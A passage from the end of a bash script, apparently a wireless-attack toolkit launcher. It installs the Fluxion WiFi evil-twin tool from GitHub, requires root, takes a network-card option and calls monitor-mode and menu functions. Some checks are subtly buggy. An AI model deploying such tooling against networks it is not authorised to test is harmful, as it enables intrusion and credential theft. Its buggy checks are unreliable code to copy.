-name fluxion.sh 2>/dev/null | echo $?) 1278 | 1279 | if [ "${fluxion_check}" == "0" ];then 1280 | 1281 | echo -ne "${grayColour}\n[*] Installing Fluxion ... ${endColour}" 1282 | 1283 | pushd /opt > /dev/null 2>&1 1284 | 1285 | git clone https://www.github.com/FluxionNetwork/fluxion.git 1286 | 1287 | popd > /dev/null 2>&1 1288 | 1289 | echo -ne "${greenColour}\n[*] Fluxion Installed Successfully ${endColour}" 1290 | 1291 | 1292 | 1293 | elif [ fluxion_check -eq 0 ];then 1294 | 1295 | echo -ne "${blueColour}[*]${endColour}${grayColour} Fluxion ${endColour}${greenColour}(Installed)${endColour}" 1296 | 1297 | fi 1298 | 1299 | } 1300 | 1301 | 1302 | ## User id verification for (root) 1303 | 1304 | if [ $(id -u) -eq "0" ];then 1305 | 1306 | declare -i parameter_counter=0; while getopts ":n:h:" arg; do 1307 | case $arg in 1308 | n) networkCard=$OPTARG; let parameter_counter+=1 ;; 1309 | h) helpPanel;; 1310 | esac 1311 | done 1312 | 1313 | if [ $parameter_counter -ne 1 ];then 1314 | 1315 | 1316 | qhelppanel 1317 | 1318 | else 1319 | 1320 | monitor_mode_verification 1321 | dependencies 1322 | menu 1323 | 1324 | fi 1325 | 1326 | else 1327 | echo -ne "\n${redColour}[!]${endColour} ${grayColour}You need to be root to execute this program${endColour}\n" 1328 | 1329 | exit 1 1330 | fi 1331 | --------------------------------------------------------------------------------